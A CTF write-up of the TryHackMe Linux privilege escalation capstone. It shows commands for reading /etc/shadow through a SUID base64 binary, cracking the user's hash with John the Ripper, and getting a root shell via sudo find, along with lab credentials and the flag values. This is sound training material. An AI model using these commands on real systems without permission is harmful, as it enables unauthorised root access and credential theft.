Writeup on TryHackMe (THM) Linux Privilege Escalation Capstone Challenge

This writeup is about the capstone challenge given in the Linux Privilege Escalation room in the TryHackMe.

Kannan Anandakrishnan

~5 min read · February 7, 2022 (Updated: February 12, 2022) · Free: Yes

Link: https://tryhackme.com/room/linprivesc

Privilege Escalation room covered a wide variety of privilege escalation options in a linux server.

The main ones covered in this room are: - SUDO access - SUID bit - Cron Jobs - NFS share - PATH - Kernel exploits - Capabilities

For the capstone challenge We've been given with the target details and asked us to find two flags.

Problem Description

You have gained SSH access to a large scientific facility. Try to elevate your privileges until you are Root.

You can access the target machine over your browser or use the SSH credentials below.

Username: leonard Password: Penny123

Reconnaissance

Lets login to the target as `leonard` user

Sudo access check

[leonard@ip-10–10–19–185 ~]$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
 #2) Think before you type.
 #3) With great power comes great responsibility.
[sudo] password for leonard:
Sorry, user leonard may not run sudo on ip-10–10–19–185.

Result: No sudo access

Cron jobs check

[leonard@ip-10–10–19–185 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# . — — — — — — — — minute (0–59)
# | . — — — — — — — hour (0–23)
# | | . — — — — — day of month (1–31)
# | | | . — — — — month (1–12) OR jan,feb,mar,apr …
# | | | | . — — day of week (0–6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

Result: No cron jobs present to exploit

NFS exports check

[leonard@ip-10–10–19–185 ~]$ cat /etc/exports
[leonard@ip-10–10–19–185 ~]$

Result: No NFS shares

SUID bit check


[leonard@ip-10–10–19–185 ~]$ find / -type f -perm -04000 -ls 2>/dev/null | cut -d '/' -f 1,2,3,4
/usr/bin/base64
/usr/bin/ksu
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chage
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/Xorg
/usr/bin/mount
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/at
/usr/bin/sudo
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/userhelper
/usr/sbin/mount.nfs
/usr/lib/polkit-1
/usr/libexec/kde4
/usr/libexec/dbus-1
/usr/libexec/spice-gtk-x86_64
/usr/libexec/qemu-bridge-helper
/usr/libexec/sssd
/usr/libexec/sssd
/usr/libexec/sssd
/usr/libexec/sssd
/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
/usr/libexec/flatpak-bwrap

Result: We have handful of binaries with suid bit enabled. Lets see where the flags could possibly present

Home Directories Listing


[leonard@ip-10–10–19–185 ~]$ ls /home/
leonard missy rootflag
[leonard@ip-10–10–19–185 ~]$ ls /home/*
/home/leonard:
perl5
ls: cannot open directory /home/missy: Permission denied
ls: cannot open directory /home/rootflag: Permission denied
```

So we got three directories present under /home, but only leonard directory is accessible and permission doesn't exist for the home directories of missy and rootflag.

Let's look at the /etc/passwd to verify the possible users present in the system.

$ cat /etc/passwd
tcpdump:x:72:72::/:/sbin/nologin
leonard:x:1000:1000:leonard:/home/leonard:/bin/bash
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
missy:x:1001:1001::/home/missy:/bin/bash

Passwd file showed that only user missy is present in the server and no user named rootflag

Alright now we have to break into missy user to identify the possibilites of privilege escalation.

—

Cracking Shadow file

To crack the credentials of Missy, we need the hashed password of the user from shadow file. To read the shadow file, let's use one of the applications with SUID bit set.

Link: https://gtfobins.github.io/gtfobins/base64/

base64 with SUID bit enables to read any privileged file, so let's grab the contents of /etc/shadow


LFILE=/etc/shadow
./base64 "$LFILE" | base64 — decode

Now copy the entry for missy in both /etc/passwd and /etc/shadow file.

passwd -> missy:x:1001:1001::/home/missy:/bin/bash
shadow -> missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::

John the Ripper

The unshadow tool combines the passwd and shadow files so John can use them.

unshadow pass.txt shad.txt > crack.txt

Let's unleash John the Ripper to crack the hash.


$ john — wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the " — format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password1 (missy)

Now we got the password for the user missy — Password1

Let's login as missy and do the reconnaissance again for privilege escalation possibilities.


[missy@ip-10–10–19–185 ~]$ sudo su -
[sudo] password for missy:
Sorry, user missy is not allowed to execute '/bin/su -' as root on ip-10–10–19–185.

[missy@ip-10–10–19–185 ~]$ sudo -l
Matching Defaults entries for missy on ip-10–10–19–185:
 !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
 LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User missy may run the following commands on ip-10–10–19–185:
 (ALL) NOPASSWD: /usr/bin/find

[missy@ip-10–10–19–185 ~]$ cat /etc/exports
[missy@ip-10–10–19–185 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# . — — — — — — — — minute (0–59)
# | . — — — — — — — hour (0–23)
# | | . — — — — — day of month (1–31)
# | | | . — — — — month (1–12) OR jan,feb,mar,apr …
# | | | | . — — day of week (0–6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

Results - No full sudo access - Sudo is allowed only for /usr/bin/find command without password - No NFS shares - No Cron jobs

Privilege Escalation using Find

We can escalate our privileges using Find if our user has sudo access to it.

Link: https://gtfobins.github.io/gtfobins/find/


Sudo
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
sudo find . -exec /bin/sh \; -quit

So using that, I managed to escalate my privileges and found the flags.


[missy@ip-10–10–19–185 ~]$ sudo find . -exec /bin/sh \; -quit
sh-4.2# whoami
root
sh-4.2# bash

[root@ip-10–10–19–185 missy]# ls /home/rootflag/
flag2.txt
[root@ip-10–10–19–185 missy]# cat /home/rootflag/flag2.txt
THM-168824782390238

[root@ip-10–10–19–185 missy]# find / -type f -name flag1.txt
/home/missy/Documents/flag1.txt

[root@ip-10–10–19–185 missy]# cat /home/missy/Documents/flag1.txt
THM-42828719920544
[root@ip-10–10–19–185 missy]#
```

Summary

Linux privilege escalation capstone challenge is simple and an interesting exercise.

It helped me to review throughly all the possible opportunities to elevate our privileges into a target system. Also I learned many things new in this room such as exploitation using suid, sudo, path, cron jobs, nfs etc.,

#oscp #cybersecurity #secops #tryhackme #thm-writeup